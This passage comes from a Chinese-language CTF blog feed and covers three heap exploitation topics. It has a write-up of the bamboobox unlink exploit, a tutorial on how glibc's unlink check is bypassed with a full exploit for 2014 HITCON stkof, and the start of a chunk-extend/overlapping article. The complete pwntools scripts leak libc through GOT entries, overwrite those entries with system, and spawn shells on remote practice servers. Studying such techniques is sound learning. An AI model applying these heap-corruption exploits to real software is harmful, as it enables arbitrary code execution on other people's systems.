class="hljs-comment">// [rsp+20h] [rbp-10h] BYREF</span> <span class="hljs-type">unsigned</span> __int64 v5; <span class="hljs-comment">// [rsp+28h] [rbp-8h]</span> v5 = __readfsqword(<span class="hljs-number">0x28u</span>); <span class="hljs-keyword">if</span> ( num ) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the index of item:"</span>); read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">8u</span>); v1 = atoi(buf); <span class="hljs-keyword">if</span> ( *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) ) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the length of item name:"</span>); read(<span class="hljs-number">0</span>, nptr, <span class="hljs-number">8u</span>); v2 = atoi(nptr); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the new name of the item:"</span>); *(_BYTE *)(*((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) + (<span class="hljs-type">int</span>)read(<span class="hljs-number">0</span>, *((<span class="hljs-type">void</span> **)&unk_6020C8 + <span class="hljs-number">2</span> * v1), v2)) = <span class="hljs-number">0</span>; } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"invaild index"</span>); } } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No item in the box"</span>); } <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28u</span>) ^ v5;}</code></pre></div><p>change_item函数负责给编号为v1的item改名,方法和add_item中完全一致。这也是堆溢出所在,因为我们输入的length如果超过该chunk的大小,就可以溢出到其他chunk中;</p><p>remove_item:</p><div class="code-wrapper"><pre><code class="hljs bash">unsigned __int64 <span class="hljs-function"><span class="hljs-title">remove_item</span></span>(){ int v1; // [rsp+Ch] [rbp-14h] char buf[8]; // [rsp+10h] [rbp-10h] BYREF unsigned __int64 v3; // [rsp+18h] [rbp-8h] v3 = __readfsqword(0x28u); <span class="hljs-keyword">if</span> ( num ) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the index of item:"</span>); <span class="hljs-built_in">read</span>(0, buf, 8u); v1 = atoi(buf); <span class="hljs-keyword">if</span> ( *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) ) { free(*((void **)&unk_6020C8 + <span class="hljs-number">2</span> * v1)); *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) = <span class="hljs-number">0</span>; *((_DWORD *)&itemlist + <span class="hljs-number">4</span> * v1) = <span class="hljs-number">0</span>; puts("remove successful!!"); --num; } else { puts("invaild index"); } } else { puts("No item in the box"); } return __readfsqword(<span class="hljs-number">0</span>x28u) ^ v3;}</code></pre></div><p>这个函数中存在free()功能。</p><p>之后按照如下思路:</p><ol><li>堆布局</li><li>伪造 fake chunk</li><li>fd/bk = ptr-0x18/ptr-0x10</li><li>修改 next chunk 的 prev_size/size</li><li>unlink 写全局指针</li><li>写 GOT 表项</li><li>先 leak 后 getshell</li></ol><blockquote><p>给一下自己的一些辅助学习方法:</p><p>Unlink过程</p><ol><li>FD = 0x2000 (fake_chunk.fd)</li><li>BK = 0x2008 (fake_chunk.bk)</li><li>FD->bk = BK → *(0x2000 + 0x18 = 0x2018) = 0x2008</li><li>BK->fd = FD → *(0x2008 + 0x10 = 0x2018) = 0x2000</li><li>最终: 0x2018 = 0x2000 (itemlist[0]被修改)</li></ol></blockquote><p><img src="/images/hitcontraining-unlink/1.png" alt></p><h2 id="exp">EXP</h2><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<span class="hljs-keyword">from</span> time <span class="hljs-keyword">import</span> sleep<span class="hljs-keyword">import</span> syscontext.arch = <span class="hljs-string">'amd64'</span>context.log_level = <span class="hljs-string">"debug"</span><span class="hljs-comment"># io = process("./bamboobox")</span>io = remote(<span class="hljs-string">'node5.buuoj.cn'</span>, <span class="hljs-number">29958</span>)elf = ELF(<span class="hljs-string">"./bamboobox"</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">DEBUG</span>(): raw_input(<span class="hljs-string">"DEBUG: "</span>) gdb.attach(io)<span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>(): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"1"</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">add</span>(<span class="hljs-params">length, name</span>): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"2"</span>) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(length).encode()) io.sendafter(<span class="hljs-string">b":"</span>, name)<span class="hljs-keyword">def</span> <span class="hljs-title function_">change</span>(<span class="hljs-params">idx, length, name</span>): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"3"</span>) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(idx).encode()) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(length).encode()) io.sendafter(<span class="hljs-string">b":"</span>, name)<span class="hljs-keyword">def</span> <span class="hljs-title function_">remove</span>(<span class="hljs-params">idx</span>): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"4"</span>) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(idx).encode())<span class="hljs-keyword">def</span> <span class="hljs-title function_">exit</span>(): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"5"</span>)<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>: add(<span class="hljs-number">0x40</span>, <span class="hljs-string">b'0'</span> * <span class="hljs-number">8</span>) add(<span class="hljs-number">0x80</span>, <span class="hljs-string">b'1'</span> * <span class="hljs-number">8</span>) add(<span class="hljs-number">0x40</span>, <span class="hljs-string">b'2'</span> * <span class="hljs-number">8</span>) ptr = <span class="hljs-number">0x6020c8</span> fakeChunk = flat([<span class="hljs-number">0</span>, <span class="hljs-number">0x41</span>, ptr - <span class="hljs-number">0x18</span>, ptr - <span class="hljs-number">0x10</span>, cyclic(<span class="hljs-number">0x20</span>), <span class="hljs-number">0x40</span>, <span class="hljs-number">0x90</span>]) change(<span class="hljs-number">0</span>, <span class="hljs-number">0x80</span>, fakeChunk) remove(<span class="hljs-number">1</span>) payload = flat([<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x40</span>, elf.got[<span class="hljs-string">'atoi'</span>]]) change(<span class="hljs-number">0</span>, <span class="hljs-number">0x80</span>, payload) show() <span class="hljs-comment"># 泄露atoi地址</span> atoi_addr = u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>)) success(<span class="hljs-string">"atoi_addr -> {:#x}"</span>.<span class="hljs-built_in">format</span>(atoi_addr)) <span class="hljs-comment"># 使用LibcSearcher查找libc版本</span> libc = LibcSearcher(<span class="hljs-string">'atoi'</span>, atoi_addr) libc_base = atoi_addr - libc.dump(<span class="hljs-string">'atoi'</span>) system_addr = libc_base + libc.dump(<span class="hljs-string">'system'</span>) success(<span class="hljs-string">"libc_base -> {:#x}"</span>.<span class="hljs-built_in">format</span>(libc_base)) success(<span class="hljs-string">"system_addr -> {:#x}"</span>.<span class="hljs-built_in">format</span>(system_addr)) pause() change(<span class="hljs-number">0</span>, <span class="hljs-number">0x8</span>, p64(system_addr)) io.sendline(<span class="hljs-string">b'$0'</span>) io.interactive() io.close()</code></pre></div>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Heap </tag>
<tag> unlink </tag>
<tag> hitcon </tag>
</tags>
</entry>
<entry>
<title>Unlink学习记录</title>
<link href="/2026/02/11/heap-ptmalloc2-unlink/"/>
<url>/2026/02/11/heap-ptmalloc2-unlink/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="overview">Overview</h2><ol><li>unlink俗称脱链,就是将链表头处的free堆块从unsorted bin中脱离出来,然后和<strong>物理地址相邻</strong>的新free的堆块合并成大堆块(向前合并或向后合并),再放入到unsorted bin中。</li><li>危害原理:通过伪造free状态的fake_chunk,伪造<code>fd</code>和<code>bk</code>指针,通过绕过unlink的检测实现unlink使其往p所在的位置写入p-0x18,从而实现<strong>任意地址写</strong>的漏洞。</li><li>漏洞产生原因:<code>Offbynull</code>、<code>offbyone</code>、堆溢出,原因是修改了堆块的使用标志位。</li></ol><h3 id="源码解读">源码解读</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/*malloc.c int_free函数中*/</span><span class="hljs-comment">/*这里p指向当前malloc_chunk结构体*/</span><span class="hljs-keyword">if</span> (!prev_inuse(p)) { prevsize = p->prev_size; size += prevsize;<span class="hljs-comment">//修改指向当前chunk的指针,指向前一个chunk。</span> p = chunk_at_offset(p, -((<span class="hljs-type">long</span>) prevsize)); unlink(p, bck, fwd);}</code></pre></div><ol><li><p>进行判断:看当前堆块中<code>p</code>这个标志位,如果<code>p</code>设置为0则为free状态,则进行unlink,否则反之;</p></li><li><p>先提取prev_size,然后当前size+prev_size,此时指针会指向当前chunk的前一个堆块,合并后的指针地址为:free的堆块地址 - 前一个chunk大小,此时<code>p</code>指针则会从现在的堆块跳到前一个堆块;</p></li></ol><div class="code-wrapper"><pre><code class="hljs c">prevsize = p->prev_size;size += prevsize;</code></pre></div><ol start="3"><li>最后是将这个堆块和相邻的(这里是上一个)一起unlink。</li></ol><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">//相关函数说明:</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s))) </span><span class="hljs-comment">/*unlink操作的实质就是:将P所指向的chunk从双向链表中移除,这里BK与FD用作临时变量*/</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> unlink(P, BK, FD) { \</span><span class="hljs-meta"> FD = P->fd; \</span><span class="hljs-meta"> BK = P->bk; \</span><span class="hljs-meta"> <span class="hljs-keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, 0)) </span> malloc_printerr (check_action, <span class="hljs-string">"corrupted double-linked list"</span>, P, AV); FD->bk = BK; \ BK->fd = FD; \ ...}</code></pre></div><p>unlink函数是如何定义的:</p><ol><li><p>从合并后新指针地址中提取出<code>fd</code>指针和<code>bk</code>指针作为临时变量;</p></li><li><p>这里有一个check,检查FD的bk和BK的fd是否指向当前堆块,若不通过则不进行unlink;</p></li></ol><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, <span class="hljs-number">0</span>)) malloc_printerr (check_action, <span class="hljs-string">"corrupted double-linked list"</span>, P, AV);</code></pre></div><ol start="3"><li>通过后会把BK赋值给FD的bk,把FD赋值给BK的fd。</li></ol><h2 id="unlink的绕过和利用">unlink的绕过和利用</h2><p>我们伪造如下信息:</p><ol><li>chunk = 0x0602280 (P是将要合并到的堆地址,P存在chunk中,相当于 <code>*chunk = P</code>)</li><li>P_fd = chunk - 0x18 = 0x0602268</li><li>P_bk = chunk - 0x10 = 0x0602270</li></ol><blockquote><p>我在学习的过程中此处卡住了,对于为什么是减去<code>0x18</code>和<code>0x10</code>这两个值我们在此复习一下为什么是减去<code>0x18</code>和<code>0x10</code>,在 glibc 的 malloc 实现(ptmalloc)中,<strong>在释放前、不在 bin 中时</strong>,chunk 结构为:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span> {</span> <span class="hljs-type">size_t</span> prev_size; <span class="hljs-comment">// 0x00 偏移(如果前一个块空闲,才有用)</span> <span class="hljs-type">size_t</span> size; <span class="hljs-comment">// 0x08 偏移(包含标志位)</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">fd</span>;</span> <span class="hljs-comment">// 0x10 偏移(仅在 bin 中使用)</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">bk</span>;</span> <span class="hljs-comment">// 0x18 偏移</span> <span class="hljs-comment">// ... 更后面还有 fd_nextsize, bk_nextsize(large bin)</span>};</code></pre></div><p>而回顾上面的内容有这样的一条:“通过后会把BK赋值给FD的bk,把FD赋值给BK的fd。”</p></blockquote><h3 id="绕过技巧">绕过技巧</h3><div class="code-wrapper"><pre><code class="hljs c">define <span class="hljs-title function_">unlink</span><span class="hljs-params">(P, BK, FD)</span> { \ FD = P->fd; \FD = <span class="hljs-number">0x602268</span> BK = P->bk; \BK = <span class="hljs-number">0x602270</span> <span class="hljs-keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, <span class="hljs-number">0</span>)) \FD->bk = *(<span class="hljs-number">0x602268</span>+<span class="hljs-number">0x18</span>) | *(<span class="hljs-number">0x602280</span>) = P \ BK->fd = *(<span class="hljs-number">0x602270</span>+<span class="hljs-number">0x10</span>) = *(<span class="hljs-number">0x602280</span>) = P ,绕过! malloc_printerr (check_action, <span class="hljs-string">"corrupted double-linked list"</span>, P, AV); FD->bk = BK; \*(<span class="hljs-number">0x602268</span>+<span class="hljs-number">0x18</span>) | *(<span class="hljs-number">0x602280</span>) = <span class="hljs-number">0x602270</span> BK->fd = FD; \ *(<span class="hljs-number">0x602270</span>+<span class="hljs-number">0x10</span>) | *(<span class="hljs-number">0x602280</span>) = <span class="hljs-number">0x602268</span> ...}</code></pre></div><ol><li>绕过检查可以总结成:<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi><mi>D</mi><mo>−</mo><mo>></mo><mi>b</mi><mi>k</mi><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">FD->bk == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.76666em;vertical-align:-0.08333em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">F</span><span class="mord mathdefault" style="margin-right:0.02778em;">D</span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.69444em;vertical-align:0em;"></span><span class="mord mathdefault">b</span><span class="mord mathdefault" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span> 和 <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>B</mi><mi>K</mi><mo>−</mo><mo>></mo><mi>f</mi><mi>d</mi><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">BK->fd == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.76666em;vertical-align:-0.08333em;"></span><span class="mord mathdefault" style="margin-right:0.05017em;">B</span><span class="mord mathdefault" style="margin-right:0.07153em;">K</span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.8888799999999999em;vertical-align:-0.19444em;"></span><span class="mord mathdefault" style="margin-right:0.10764em;">f</span><span class="mord mathdefault">d</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span>,等价于: <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>∗</mo><mo stretchy="false">(</mo><msub><mi>P</mi><mi>f</mi></msub><mi>d</mi><mo>+</mo><mn>0</mn><mi>x</mi><mn>18</mn><mo stretchy="false">)</mo><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">*(P_fd + 0x18) == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.036108em;vertical-align:-0.286108em;"></span><span class="mord">∗</span><span class="mopen">(</span><span class="mord"><span class="mord mathdefault" style="margin-right:0.13889em;">P</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3361079999999999em;"><span style="top:-2.5500000000000003em;margin-left:-0.13889em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathdefault mtight" style="margin-right:0.10764em;">f</span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.286108em;"><span></span></span></span></span></span></span><span class="mord mathdefault">d</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">0</span><span class="mord mathdefault">x</span><span class="mord">1</span><span class="mord">8</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span> 和 <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>∗</mo><mo stretchy="false">(</mo><msub><mi>P</mi><mi>b</mi></msub><mi>k</mi><mo>+</mo><mn>0</mn><mi>x</mi><mn>10</mn><mo stretchy="false">)</mo><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">*(P_bk + 0x10) == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">∗</span><span class="mopen">(</span><span class="mord"><span class="mord mathdefault" style="margin-right:0.13889em;">P</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.33610799999999996em;"><span style="top:-2.5500000000000003em;margin-left:-0.13889em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathdefault mtight">b</span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathdefault" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">0</span><span class="mord mathdefault">x</span><span class="mord">1</span><span class="mord">0</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span></li><li>可以构造成</li></ol><div class="code-wrapper"><pre><code class="hljs text">P_fd = P - 0x18P_bk = P - 0x10</code></pre></div><p>即:</p><div class="code-wrapper"><pre><code class="hljs text">FD = P - 0x18FD->bk = (P - 0x18) + 0x18 = P → 内容等于 P(绕过)BK = P - 0x10BK->fd = (P - 0x10) + 0x10 = P → 内容等于 P(绕过)</code></pre></div><p>总结起来就是:<strong>让 <code>P->fd</code> 指向 <code>P - 0x18</code>,<code>P->bk</code> 指向 <code>P - 0x10</code>,就能绕过 <code>FD->bk == P</code> 和 <code>BK->fd == P</code> 检查,并使 <code>\*P</code> 被覆写为 <code>P - 0x18</code>。</strong></p><h2 id="2014-hitcon-stkof">2014 HITCON stkof</h2><ol><li>堆布局</li><li>伪造 fake chunk</li><li>fd/bk = ptr-0x18/ptr-0x10</li><li>修改 next chunk 的 prev_size/size</li><li>unlink 写全局指针</li><li>写 GOT 表项</li><li>先 leak 后 getshell</li></ol><p><strong>EXP:</strong></p><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *context.log_level = <span class="hljs-string">'debug'</span><span class="hljs-comment">#libc = ELF('./libc.so.6')</span><span class="hljs-comment">#sh = process("./stkof")</span>sh = remote(<span class="hljs-string">"node5.buuoj.cn"</span>,<span class="hljs-number">25830</span>)stkof = ELF(<span class="hljs-string">'./stkof'</span>)head = <span class="hljs-number">0x602140</span><span class="hljs-keyword">def</span> <span class="hljs-title function_">malloc</span>(<span class="hljs-params">size</span>): sh.sendline(<span class="hljs-string">b'1'</span>) sh.sendline(<span class="hljs-built_in">str</span>(size)) sh.recvuntil(<span class="hljs-string">b'OK\n'</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">idx,size,content</span>): sh.sendline(<span class="hljs-string">b'2'</span>) sh.sendline(<span class="hljs-built_in">str</span>(idx)) sh.sendline(<span class="hljs-built_in">str</span>(size)) sh.send(content) sh.recvuntil(<span class="hljs-string">'OK\n'</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">idx</span>): sh.sendline(<span class="hljs-string">b'3'</span>) sh.sendline(<span class="hljs-built_in">str</span>(idx))malloc(<span class="hljs-number">0x100</span>) malloc(<span class="hljs-number">0x30</span>) malloc(<span class="hljs-number">0x80</span>) payload = p64(<span class="hljs-number">0</span>) <span class="hljs-comment">#pre_size = 0</span>payload += p64(<span class="hljs-number">0x20</span>) <span class="hljs-comment">#fake size</span>payload += p64(head + <span class="hljs-number">0x10</span> - <span class="hljs-number">0x18</span>) payload += p64(head + <span class="hljs-number">0x10</span> - <span class="hljs-number">0x10</span>) payload += p64(<span class="hljs-number">0x20</span>) payload = payload.ljust(<span class="hljs-number">0x30</span>,<span class="hljs-string">b'a'</span>)payload += p64(<span class="hljs-number">0x30</span>) payload += p64(<span class="hljs-number">0x90</span>) edit(<span class="hljs-number">2</span>, <span class="hljs-built_in">len</span>(payload), payload) free(<span class="hljs-number">3</span>) sh.recvuntil(<span class="hljs-string">'OK\n'</span>)payload2 = <span class="hljs-string">b'a'</span> * <span class="hljs-number">8</span> + p64(stkof.got[<span class="hljs-string">'free'</span>]) + p64(stkof.got[<span class="hljs-string">'puts'</span>]) + p64(stkof.got[<span class="hljs-string">'atoi'</span>])edit(<span class="hljs-number">2</span>,<span class="hljs-built_in">len</span>(payload2),payload2) payload3 = p64(stkof.plt[<span class="hljs-string">'puts'</span>])edit(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(payload3),payload3) free(<span class="hljs-number">1</span>) puts_addr = u64(sh.recvuntil(<span class="hljs-string">'\nOK\n'</span>, drop=<span class="hljs-literal">True</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>)) <span class="hljs-comment">#</span><span class="hljs-comment"># libc_base = puts_addr - libc.symbols['puts']</span><span class="hljs-comment"># binsh_addr = libc_base + next(libc.search(b'/bin/sh'))</span><span class="hljs-comment"># system_addr = libc_base + libc.symbols['system']</span><span class="hljs-comment">#</span>libc = LibcSearcher(<span class="hljs-string">'puts'</span>,puts_addr)libc_base = puts_addr - libc.dump(<span class="hljs-string">'puts'</span>)system_addr = libc_base + libc.dump(<span class="hljs-string">'system'</span>)payload4 = p64(system_addr)binsh_addr =libc_base + libc.dump(<span class="hljs-string">'str_bin_sh'</span>)edit(<span class="hljs-number">2</span>, <span class="hljs-built_in">len</span>(payload4), payload4)sh.send(p64(binsh_addr))sh.interactive()</code></pre></div><h2 id="references">References</h2><ul><li><p>CTF-Wiki</p><ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/unlink/#2014-hitcon-stkof">Unlink</a></li></ul></li><li><p>CSDN</p><ul><li><a href="https://hollk.blog.csdn.net/article/details/108481889?spm=1001.2014.3001.5502">好好说话之unlink</a></li><li><a href="https://blog.csdn.net/fzucaicai/article/details/129705468">堆溢出——unlink漏洞攻击(bamboobox)</a></li></ul></li><li><p>博客园</p><ul><li><a href="https://www.cnblogs.com/lordtianqiyi/articles/16345374.html">堆漏洞之unlink & 2014 HITCON stkof</a></li><li><a href="https://www.cnblogs.com/nemuzuki/p/17286811.html">堆块chunk介绍&堆溢出漏洞的unlink利用原理</a></li></ul></li><li><p>Blogs</p><ul><li><a href="https://iyheart.github.io/2024/10/11/CTFblog/PWN%E7%B3%BB%E5%88%97blog/Linux_pwn/2.%E5%A0%86%E7%B3%BB%E5%88%97/PWN%E5%A0%86unlink/">PWN堆unlink</a></li><li><a href="https://jimi-lab.github.io/2025/08/18/%E5%A0%86%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95/">堆溢出利用</a></li><li><a href="https://www.nan0in27.cn/p/%E5%A0%86%E6%BA%A2%E5%87%BAunlink%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBbuu%E4%B8%BE%E4%BE%8B/">堆溢出——unlink漏洞攻击(buu举例)</a></li><li><a href="https://zicai.github.io/wooyun_articles/drops/%E5%A0%86%E6%BA%A2%E5%87%BA%E7%9A%84unlink%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95.html">堆溢出的unlink利用方法</a></li></ul></li><li><p>先知</p><ul><li><a href="https://xz.aliyun.com/news/5361">堆入门—unlink的理解和各种题型总结</a></li></ul></li><li><p>看雪</p><ul><li><a href="https://bbs.kanxue.com/thread-289464.htm">堆学习:Unlink attack</a></li></ul></li><li><p>Bilibili</p><ul><li><a href="https://www.bilibili.com/video/BV11q4y1E7E2?vd_source=03d433e8ec785208bc57517d4c340d73">【星盟安全】PWN系列教程 第20节 Unlink</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Pwn </tag>
<tag> 堆 </tag>
<tag> unlink </tag>
</tags>
</entry>
<entry>
<title>Chunk Extend and Overlapping</title>
<link href="/2026/02/09/chunk-extend-overlapping/"/>
<url>/2026/02/09/chunk-extend-overlapping/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="overview">Overview</h2><blockquote><p>chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件:</p></blockquote><ul><li>程序中存在基于堆的漏洞</li><li>漏洞可以控制 chunk header 中的数据</li></ul><h2 id="ptmalloc对堆进行操作时使用的宏">ptmalloc对堆进行操作时使用的宏</h2><p>chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏;</p><p>在 ptmalloc 中,获取 chunk 块大小的操作如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* Get size, ignoring use bits */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> chunksize(p) (chunksize_nomask(p) & ~(SIZE_BITS))</span><span class="hljs-comment">/* Like chunksize, but do not mask SIZE_BITS. */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> chunksize_nomask(p) ((p)->mchunk_size)</span></code></pre></div><p>即使用当前块指针加上当前块大小。</p><p>在 ptmalloc 中,获取前一个 chunk 信息的操作如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* Size of the chunk below P. Only valid if prev_inuse (P). */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> prev_size(p) ((p)->mchunk_prev_size)</span><span class="hljs-comment">/* Ptr to previous physical malloc_chunk. Only valid if prev_inuse (P). */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> prev_chunk(p) ((mchunkptr)(((char *) (p)) - prev_size(p)))</span></code></pre></div><p>即通过 malloc_chunk->prev_size 获取前一块大小,然后使用本 chunk 地址减去所得大小。</p><p>在 ptmalloc,判断当前 chunk 是否是 use 状态的操作如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">define</span> inuse(p)</span> ((((mchunkptr)(((<span class="hljs-type">char</span> *) (p)) + chunksize(p)))->mchunk_size) & PREV_INUSE)</code></pre></div><p>即查看下一 chunk 的 prev_inuse 域,而下一块地址又如我们前面所述是根据当前 chunk 的 size 计算得出的。</p><blockquote><p>具体为什么是这样以及更多操作详见 <a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/heap-structure/">CTF Wiki - 堆相关数据结构</a>。</p></blockquote><p>通过上面几个宏可以看出,ptmalloc 通过 